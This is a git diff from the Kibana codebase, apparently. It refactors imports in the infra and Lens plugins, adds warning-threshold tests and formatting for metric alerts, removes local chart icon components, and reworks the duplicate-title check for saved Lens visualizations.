32a5be3e071c7..3fb8884f963c4 100644 --- a/x-pack/plugins/infra/public/pages/logs/page_template.tsx +++ b/x-pack/plugins/infra/public/pages/logs/page_template.tsx @@ -9,7 +9,7 @@ import React from 'react'; import { i18n } from '@kbn/i18n'; import type { LazyObservabilityPageTemplateProps } from '@kbn/observability-plugin/public'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; import { useKibanaContextForPlugin } from '../../hooks/use_kibana'; interface LogsPageTemplateProps extends LazyObservabilityPageTemplateProps { @@ -35,7 +35,7 @@ export const LogsPageTemplate: React.FC = ({ const { http } = useKibana().services; const basePath = http!.basePath.get(); - const noDataConfig: KibanaPageTemplateProps['noDataConfig'] = hasData + const noDataConfig: NoDataConfig | undefined = hasData ? undefined : { solution: i18n.translate('xpack.infra.logs.noDataConfig.solutionName', { diff --git a/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts b/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts index 7db25ae6898f1..a4e5cc4b92791 100644 --- a/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts +++ b/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts @@ -7,7 +7,7 @@ import { encode } from 'rison-node'; import uuid from 'uuid'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { LinkDescriptor } from '@kbn/observability-plugin/public'; import { TIMESTAMP_FIELD } from '../../../../../../common/constants'; import { MetricsSourceConfigurationProperties } from '../../../../../../common/metrics_sources'; diff --git a/x-pack/plugins/infra/public/pages/metrics/page_template.tsx b/x-pack/plugins/infra/public/pages/metrics/page_template.tsx index 53a0cc21dd7ce..4d4dec50dd74c 100644 --- a/x-pack/plugins/infra/public/pages/metrics/page_template.tsx +++ b/x-pack/plugins/infra/public/pages/metrics/page_template.tsx @@ -7,7 +7,7 @@ import { i18n } from '@kbn/i18n'; import type { LazyObservabilityPageTemplateProps } from '@kbn/observability-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; import React from 'react'; import { noMetricIndicesPromptDescription, @@ -33,7 +33,7 @@ export const MetricsPageTemplate: React.FC = ({ }, } = useKibanaContextForPlugin(); - const noDataConfig: KibanaPageTemplateProps['noDataConfig'] = hasData + const noDataConfig: NoDataConfig | undefined = hasData ? undefined : { solution: i18n.translate('xpack.infra.metrics.noDataConfig.solutionName', { diff --git a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts index 4f0060b3dddf2..08870ddfb6f94 100644 --- a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts +++ b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts @@ -29,6 +29,7 @@ import { createMetricThresholdExecutor, FIRED_ACTIONS, NO_DATA_ACTIONS, + WARNING_ACTIONS, } from './metric_threshold_executor'; import { Evaluation } from './lib/evaluate_rule'; import type { LogMeta, Logger } from '@kbn/logging'; @@ -1504,6 +1505,91 @@ describe('The metric threshold alert type', () => { expect(mostRecentAction(instanceID)).toBeErrorAction(); }); }); + + describe('querying the entire infrastructure with warning threshold', () => { + afterAll(() => clearInstances()); + const instanceID = '*'; + + const execute = () => + executor({ + ...mockOptions, + services, + params: { + sourceId: 'default', + criteria: [ + { + ...baseNonCountCriterion, + comparator: Comparator.GT, + threshold: [9999], + }, + ], + }, + }); + + const setResults = ({ + comparator = Comparator.GT, + threshold = [9999], + warningComparator = Comparator.GT, + warningThreshold = [2.49], + metric = 'test.metric.1', + currentValue = 7.59, + shouldWarn = false, + }) => + setEvaluationResults([ + { + '*': { + ...baseNonCountCriterion, + comparator, + threshold, + warningComparator, + warningThreshold, + metric, + currentValue, + timestamp: new Date().toISOString(), + shouldFire: false, + shouldWarn, + isNoData: false, + }, + }, + ]); + + test('warns as expected with the > comparator', async () => { + setResults({ warningThreshold: [2.49], currentValue: 2.5, shouldWarn: true }); + await execute(); + expect(mostRecentAction(instanceID)).toBeWarnAction(); + + setResults({ warningThreshold: [2.49], currentValue: 1.23, shouldWarn: false }); + await execute(); + expect(mostRecentAction(instanceID)).toBe(undefined); + }); + + test('reports expected warning values to the action context', async () => { + setResults({ warningThreshold: [2.49], currentValue: 2.5, shouldWarn: true }); + await execute(); + + const { action } = mostRecentAction(instanceID); + expect(action.group).toBe('*'); + expect(action.reason).toBe( + 'test.metric.1 is 2.5 in the last 1 min for all hosts. Alert when > 2.49.' + ); + }); + + test('reports expected warning values to the action context for percentage metric', async () => { + setResults({ + warningThreshold: [0.81], + currentValue: 0.82, + shouldWarn: true, + metric: 'system.cpu.user.pct', + }); + await execute(); + + const { action } = mostRecentAction(instanceID); + expect(action.group).toBe('*'); + expect(action.reason).toBe( + 'system.cpu.user.pct is 82% in the last 1 min for all hosts. Alert when > 81%.' + ); + }); + }); }); const createMockStaticConfiguration = (sources: any) => ({ @@ -1622,6 +1708,14 @@ expect.extend({ pass, }; }, + toBeWarnAction(action?: Action) { + const pass = action?.id === WARNING_ACTIONS.id && action?.action.alertState === 'WARNING'; + const message = () => `expected ${JSON.stringify(action)} to be an WARNING action`; + return { + message, + pass, + }; + }, toBeNoDataAction(action?: Action) { const pass = action?.id === NO_DATA_ACTIONS.id && action?.action.alertState === 'NO DATA'; const message = () => `expected ${action} to be a NO DATA action`; @@ -1645,9 +1739,8 @@ declare global { namespace jest { interface Matchers { toBeAlertAction(action?: Action): R; - + toBeWarnAction(action?: Action): R; toBeNoDataAction(action?: Action): R; - toBeErrorAction(action?: Action): R; } } diff --git a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts index 2a77f7ca79beb..14b5fe8e75614 100644 --- a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts +++ b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts @@ -322,28 +322,32 @@ const formatAlertResult = ( alertResult; const noDataValue = i18n.translate( 'xpack.infra.metrics.alerting.threshold.noDataFormattedValue', - { - defaultMessage: '[NO DATA]', - } + { defaultMessage: '[NO DATA]' } ); - if (!metric.endsWith('.pct')) + const thresholdToFormat = useWarningThreshold ? warningThreshold! : threshold; + const comparatorToUse = useWarningThreshold ? warningComparator! : comparator; + + if (metric.endsWith('.pct')) { + const formatter = createFormatter('percent'); return { ...alertResult, - currentValue: currentValue ?? noDataValue, + currentValue: + currentValue !== null && currentValue !== undefined ? formatter(currentValue) : noDataValue, + threshold: Array.isArray(thresholdToFormat) + ? thresholdToFormat.map((v: number) => formatter(v)) + : formatter(thresholdToFormat), + comparator: comparatorToUse, }; - const formatter = createFormatter('percent'); - const thresholdToFormat = useWarningThreshold ? warningThreshold! : threshold; - const comparatorToFormat = useWarningThreshold ? warningComparator! : comparator; + } + const formatter = createFormatter('highPrecision'); return { ...alertResult, currentValue: - currentValue !== null && typeof currentValue !== 'undefined' - ? formatter(currentValue) - : noDataValue, + currentValue !== null && currentValue !== undefined ? formatter(currentValue) : noDataValue, threshold: Array.isArray(thresholdToFormat) ? thresholdToFormat.map((v: number) => formatter(v)) - : thresholdToFormat, - comparator: comparatorToFormat, + : formatter(thresholdToFormat), + comparator: comparatorToUse, }; }; diff --git a/x-pack/plugins/infra/server/lib/metrics/index.ts b/x-pack/plugins/infra/server/lib/metrics/index.ts index c4641e265ea55..54dd69adb3ff4 100644 --- a/x-pack/plugins/infra/server/lib/metrics/index.ts +++ b/x-pack/plugins/infra/server/lib/metrics/index.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { ThrowReporter } from 'io-ts/lib/ThrowReporter'; import { TIMESTAMP_FIELD } from '../../../common/constants'; import { MetricsAPIRequest, MetricsAPIResponse, afterKeyObjectRT } from '../../../common/http_api'; diff --git a/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts b/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts index 97a0707a4c215..bc93d1f539e2a 100644 --- a/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts +++ b/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { first, startsWith } from 'lodash'; import type { InfraPluginRequestHandlerContext } from '../../../types'; import { KibanaFramework } from '../../../lib/adapters/framework/kibana_framework_adapter'; diff --git a/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts b/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts index 6d41f17a6bb5e..de797385c7171 100644 --- a/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts +++ b/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { InfraDatabaseSearchResponse } from '../lib/adapters/framework'; export const createAfterKeyHandler = diff --git a/x-pack/plugins/lens/public/app_plugin/app.scss b/x-pack/plugins/lens/public/app_plugin/app.scss index 58ecce5592937..3aa98ca1640b9 100644 --- a/x-pack/plugins/lens/public/app_plugin/app.scss +++ b/x-pack/plugins/lens/public/app_plugin/app.scss @@ -19,25 +19,6 @@ flex-grow: 1; } -.lensChartIcon__subdued { - fill: $euiTextSubduedColor; - - .lnsLayerChartSwitch__item-isSelected & { - fill: currentColor; - } -} - -.lensChartIcon__accent { - fill: $euiColorVis0; - - .lnsLayerChartSwitch__item-isSelected & { - fill: makeGraphicContrastColor($euiColorVis0, $euiColorDarkShade); - } -} -.lensAnnotationIconNoFill { - fill: none; -} - .lensAnnotationIconFill { fill: $euiColorEmptyShade; } diff --git a/x-pack/plugins/lens/public/app_plugin/app.test.tsx b/x-pack/plugins/lens/public/app_plugin/app.test.tsx index a2e247cc427c8..03cf38f141f0d 100644 --- a/x-pack/plugins/lens/public/app_plugin/app.test.tsx +++ b/x-pack/plugins/lens/public/app_plugin/app.test.tsx @@ -882,8 +882,7 @@ describe('Lens App', () => { }); }); expect(checkForDuplicateTitle).toHaveBeenCalledWith( - expect.objectContaining({ id: '123' }), - false, + expect.objectContaining({ id: '123', isTitleDuplicateConfirmed: false }), onTitleDuplicate, expect.anything() ); diff --git a/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx b/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx index 6769010d8f721..373d632b2d51e 100644 --- a/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx +++ b/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx @@ -251,15 +251,13 @@ export const runSaveLensVisualization = async ( { id: originalSavedObjectId, title: docToSave.title, - copyOnSave: saveProps.newCopyOnSave, + displayName: i18n.translate('xpack.lens.app.saveModalType', { + defaultMessage: 'Lens visualization', + }), lastSavedTitle: lastKnownDoc.title, - getEsType: () => 'lens', - getDisplayName: () => - i18n.translate('xpack.lens.app.saveModalType', { - defaultMessage: 'Lens visualization', - }), + copyOnSave: saveProps.newCopyOnSave, + isTitleDuplicateConfirmed: saveProps.isTitleDuplicateConfirmed, }, - saveProps.isTitleDuplicateConfirmed, saveProps.onTitleDuplicate, { savedObjectsClient, diff --git a/x-pack/plugins/lens/public/assets/annotation_icons/circle.tsx b/x-pack/plugins/lens/public/assets/annotation_icons/circle.tsx deleted file mode 100644 index fe19dc7e4c8fc..0000000000000 --- a/x-pack/plugins/lens/public/assets/annotation_icons/circle.tsx +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import * as React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; - -export const IconCircle = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - -); diff --git a/x-pack/plugins/lens/public/assets/annotation_icons/triangle.tsx b/x-pack/plugins/lens/public/assets/annotation_icons/triangle.tsx deleted file mode 100644 index 9924c049004cf..0000000000000 --- a/x-pack/plugins/lens/public/assets/annotation_icons/triangle.tsx +++ /dev/null @@ -1,30 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import * as React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; - -export const IconTriangle = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_area.tsx b/x-pack/plugins/lens/public/assets/chart_area.tsx deleted file mode 100644 index 664735205d97e..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_area.tsx +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartArea = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar.tsx b/x-pack/plugins/lens/public/assets/chart_bar.tsx deleted file mode 100644 index 991c9a6c74ced..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar.tsx +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBar = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_horizontal.tsx b/x-pack/plugins/lens/public/assets/chart_bar_horizontal.tsx deleted file mode 100644 index dfd25158cc295..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_horizontal.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarHorizontal = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_percentage.tsx b/x-pack/plugins/lens/public/assets/chart_bar_horizontal_percentage.tsx deleted file mode 100644 index a3c79991f2aff..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_percentage.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarHorizontalPercentage = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_stacked.tsx b/x-pack/plugins/lens/public/assets/chart_bar_horizontal_stacked.tsx deleted file mode 100644 index d6abbaa37aaa0..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_stacked.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarHorizontalStacked = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_percentage.tsx b/x-pack/plugins/lens/public/assets/chart_bar_percentage.tsx deleted file mode 100644 index c297ee831f27c..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_percentage.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarPercentage = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_stacked.tsx b/x-pack/plugins/lens/public/assets/chart_bar_stacked.tsx deleted file mode 100644 index c5775ce4bf859..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_stacked.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarStacked = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx index 7eff9a5961e83..7f0034ad73366 100644 --- a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx +++ b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx @@ -19,7 +19,7 @@ import { ReactExpressionRendererType } from '@kbn/expressions-plugin/public'; import { SuggestionPanel, SuggestionPanelProps, SuggestionPanelWrapper } from './suggestion_panel'; import { getSuggestions } from './suggestion_helpers'; import { EuiIcon, EuiPanel, EuiToolTip, EuiAccordion } from '@elastic/eui'; -import { LensIconChartDatatable } from '../../assets/chart_datatable'; +import { IconChartDatatable } from '@kbn/chart-icons'; import { mountWithProvider } from '../../mocks'; import { applyChanges, @@ -286,7 +286,7 @@ describe('suggestion_panel', () => { getSuggestionsMock.mockReturnValue([ { datasourceState: {}, - previewIcon: LensIconChartDatatable, + previewIcon: IconChartDatatable, score: 0.5, visualizationState: suggestion1State, visualizationId: 'testVis', @@ -317,7 +317,7 @@ describe('suggestion_panel', () => { expect(instance.find(SELECTORS.SUGGESTIONS_PANEL).find(EuiIcon)).toHaveLength(1); expect(instance.find(SELECTORS.SUGGESTIONS_PANEL).find(EuiIcon).prop('type')).toEqual( - LensIconChartDatatable + IconChartDatatable ); }); diff --git a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx index 8f32ff75c51f0..1d575d9809ad4 100644 --- a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx +++ b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx @@ -10,9 +10,9 @@ import { EuiPageContentBody, EuiText } from '@elastic/eui'; import { FormattedMessage } from '@kbn/i18n-react'; import { i18n } from '@kbn/i18n'; import { UiActionsStart, VISUALIZE_GEO_FIELD_TRIGGER } from '@kbn/ui-actions-plugin/public'; +import { GlobeIllustration } from '@kbn/chart-icons'; import { getVisualizeGeoFieldMessage } from '../../../utils'; import { DragDrop } from '../../../drag_drop'; -import { GlobeIllustration } from '../../../assets/globe_illustration'; import { APP_ID } from '../../../../common/constants'; import './geo_field_workspace_panel.scss'; diff --git a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx index 9d23dd28b3707..07e5b0a3e8c1f 100644 --- a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx +++ b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx @@ -23,9 +23,9 @@ import { EuiSpacer, EuiTextColor, } from '@elastic/eui'; -import type { CoreStart, ApplicationStart } from '@kbn/core/public'; +import type { CoreStart } from '@kbn/core/public'; import type { DataPublicPluginStart, ExecutionContextSearch } from '@kbn/data-plugin/public'; -import { RedirectAppLinks } from '@kbn/kibana-react-plugin/public'; +import { RedirectAppLinks } from '@kbn/shared-ux-link-redirect-app'; import type { ExpressionRendererEvent, ExpressionRenderError, @@ -35,6 +35,7 @@ import type { UiActionsStart } from '@kbn/ui-actions-plugin/public'; import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; import type { DefaultInspectorAdapters } from '@kbn/expressions-plugin/common'; import type { Datatable } from '@kbn/expressions-plugin/public'; +import { DropIllustration } from '@kbn/chart-icons'; import { trackUiCounterEvents } from '../../../lens_ui_telemetry'; import { FramePublicAPI, @@ -51,7 +52,6 @@ import { DragDrop, DragContext, DragDropIdentifier } from '../../../drag_drop'; import { switchToSuggestion } from '../suggestion_helpers'; import { buildExpression } from '../expression_helpers'; import { WorkspacePanelWrapper } from './workspace_panel_wrapper'; -import { DropIllustration } from '../../../assets/drop_illustration'; import applyChangesIllustrationDark from '../../../assets/render_dark@2x.png'; import applyChangesIllustrationLight from '../../../assets/render_light@2x.png'; import { @@ -547,7 +547,7 @@ export const InnerWorkspacePanel = React.memo(function InnerWorkspacePanel({ setLocalState={setLocalState} localState={{ ...localState, configurationValidationError, missingRefsErrors }} ExpressionRendererComponent={ExpressionRendererComponent} - application={core.application} + core={core} activeDatasourceId={activeDatasourceId} onRender$={onRender$} onData$={onData$} @@ -622,7 +622,7 @@ export const VisualizationWrapper = ({ setLocalState, localState, ExpressionRendererComponent, - application, + core, activeDatasourceId, onRender$, onData$, @@ -643,7 +643,7 @@ export const VisualizationWrapper = ({ unknownVisError?: Array<{ shortMessage: string; longMessage: React.ReactNode }>; }; ExpressionRendererComponent: ReactExpressionRendererType; - application: ApplicationStart; + core: CoreStart; activeDatasourceId: string | null; onRender$: () => void; onData$: (data: unknown, adapters?: Partial) => void; @@ -766,18 +766,18 @@ export const VisualizationWrapper = ({ if (localState.missingRefsErrors?.length) { // Check for access to both Management app && specific indexPattern section - const { management: isManagementEnabled } = application.capabilities.navLinks; + const { management: isManagementEnabled } = core.application.capabilities.navLinks; const isIndexPatternManagementEnabled = - application.capabilities.management.kibana.indexPatterns; + core.application.capabilities.management.kibana.indexPatterns; return ( + {!incompleteInfo && selectedColumn && temporaryState === 'none' && ( { diff --git a/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx b/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx index 02ca96e147605..1ec3c3b41ca40 100644 --- a/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx +++ b/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx @@ -452,7 +452,12 @@ function FieldItemPopoverContents(props: State & FieldItemProps) { let title = <>; if (props.isLoading) { - return ; + return ( + <> + {panelHeader} + + + ); } else if (field.type.includes('range')) { return ( <> diff --git a/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx b/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx index 50eb6df5723f7..40b2f66b2b93d 100644 --- a/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx +++ b/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx @@ -457,7 +457,7 @@ export const dateHistogramOperation: OperationDefinition< ); }, helpComponentTitle: i18n.translate('xpack.lens.indexPattern.dateHistogram.titleHelp', { - defaultMessage: 'How auto date histogram works', + defaultMessage: 'How Date histogram works', }), helpComponent() { const infiniteBound = i18n.translate('xpack.lens.indexPattern.dateHistogram.moreThanYear', { @@ -471,14 +471,14 @@ export const dateHistogramOperation: OperationDefinition< <>

{i18n.translate('xpack.lens.indexPattern.dateHistogram.autoBasicExplanation', { - defaultMessage: 'The auto date histogram splits a data field into buckets by interval.', + defaultMessage: 'Date histogram splits data into time intervals.', })}

{UI_SETTINGS.HISTOGRAM_MAX_BARS}, targetBarSetting: {UI_SETTINGS.HISTOGRAM_BAR_TARGET}, diff --git a/x-pack/plugins/lens/public/lens_attribute_service.ts b/x-pack/plugins/lens/public/lens_attribute_service.ts index 6181fbf22ab26..7fe4065ede66d 100644 --- a/x-pack/plugins/lens/public/lens_attribute_service.ts +++ b/x-pack/plugins/lens/public/lens_attribute_service.ts @@ -80,12 +80,11 @@ export function getLensAttributeService( return checkForDuplicateTitle( { title: props.newTitle, - copyOnSave: false, + displayName: DOC_TYPE, + isTitleDuplicateConfirmed: props.isTitleDuplicateConfirmed, lastSavedTitle: '', - getEsType: () => DOC_TYPE, - getDisplayName: () => DOC_TYPE, + copyOnSave: false, }, - props.isTitleDuplicateConfirmed, props.onTitleDuplicate, { savedObjectsClient, diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts index 8d6ca5c3b7640..c04db1f39ac61 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts @@ -6,26 +6,24 @@ */ import type { OverlayStart, SavedObjectsClientContract } from '@kbn/core/public'; -import type { SavedObject } from '@kbn/saved-objects-plugin/public'; +import { DOC_TYPE } from '../../../common'; import { SAVE_DUPLICATE_REJECTED } from './constants'; import { findObjectByTitle } from './find_object_by_title'; import { displayDuplicateTitleConfirmModal } from './display_duplicate_title_confirm_modal'; +import type { ConfirmModalSavedObjectMeta } from './types'; /** - * check for an existing SavedObject with the same title in ES + * check for an existing saved object with the same title in ES * returns Promise when it's no duplicate, or the modal displaying the warning * that's there's a duplicate is confirmed, else it returns a rejected Promise */ export async function checkForDuplicateTitle( - savedObject: Pick< - SavedObject, - 'id' | 'title' | 'getDisplayName' | 'lastSavedTitle' | 'copyOnSave' | 'getEsType' - >, - isTitleDuplicateConfirmed: boolean, + savedObjectMeta: ConfirmModalSavedObjectMeta, onTitleDuplicate: (() => void) | undefined, services: { savedObjectsClient: SavedObjectsClientContract; overlays: OverlayStart } -): Promise { +): Promise { const { savedObjectsClient, overlays } = services; + const { id, title, isTitleDuplicateConfirmed, lastSavedTitle, copyOnSave } = savedObjectMeta; // Don't check for duplicates if user has already confirmed save with duplicate title if (isTitleDuplicateConfirmed) { @@ -34,17 +32,13 @@ export async function checkForDuplicateTitle( // Don't check if the user isn't updating the title, otherwise that would become very annoying to have // to confirm the save every time, except when copyOnSave is true, then we do want to check. - if (savedObject.title === savedObject.lastSavedTitle && !savedObject.copyOnSave) { + if (title === lastSavedTitle && !copyOnSave) { return true; } - const duplicate = await findObjectByTitle( - savedObjectsClient, - savedObject.getEsType(), - savedObject.title - ); + const duplicate = await findObjectByTitle(savedObjectsClient, DOC_TYPE, title); - if (!duplicate || duplicate.id === savedObject.id) { + if (!duplicate || duplicate.id === id) { return true; } @@ -55,5 +49,5 @@ export async function checkForDuplicateTitle( // TODO: make onTitleDuplicate a required prop and remove UI components from this class // Need to leave here until all users pass onTitleDuplicate. - return displayDuplicateTitleConfirmModal(savedObject, overlays); + return displayDuplicateTitleConfirmModal(savedObjectMeta, overlays); } diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx b/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx index c788660eea647..9b24a2be54ce2 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx @@ -16,7 +16,7 @@ export function confirmModalPromise( title = '', confirmBtnText = '', overlays: OverlayStart -): Promise { +): Promise { return new Promise((resolve, reject) => { const cancelButtonText = i18n.translate('xpack.lens.confirmModal.cancelButtonLabel', { defaultMessage: 'Cancel', diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts index 6c5a94c8c3216..e0c61d202da72 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts @@ -7,25 +7,25 @@ import { i18n } from '@kbn/i18n'; import type { OverlayStart } from '@kbn/core/public'; -import type { SavedObject } from '@kbn/saved-objects-plugin/public'; +import type { ConfirmModalSavedObjectMeta } from './types'; import { SAVE_DUPLICATE_REJECTED } from './constants'; import { confirmModalPromise } from './confirm_modal_promise'; export function displayDuplicateTitleConfirmModal( - savedObject: Pick, + { title, displayName }: ConfirmModalSavedObjectMeta, overlays: OverlayStart -): Promise { +): Promise { const confirmMessage = i18n.translate( 